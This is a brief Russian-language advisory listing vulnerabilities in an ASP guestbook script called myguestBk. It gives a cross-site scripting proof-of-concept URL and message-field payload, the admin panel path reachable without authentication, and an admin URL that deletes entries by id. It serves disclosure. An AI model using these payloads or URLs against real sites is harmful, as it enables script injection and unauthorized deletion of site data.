1) Межсайтовый скриптинг 

http://[target]/myguestBk/add1.asp?name=Name&subject=Subj&email=M@IL&
message=<scr*pt>alert («Test!»)</scr*pt> 

Или открыть http://[target]/myguestBk/add.asp и написать в поле «Message» :
<scr*pt>alert ("Test!")</scr*pt> затем нажать «Post Message». 

2) Неавторизированный доступ к панели администратора
http://[target]/myguestBk/admin/index.asp 

Удаление новостей: http://[target]/myguestBk/admin/delEnt.asp?id=NEWSNUMBER,
где NEWSNUMBER — номер новости в базе данных.



Оставить мнение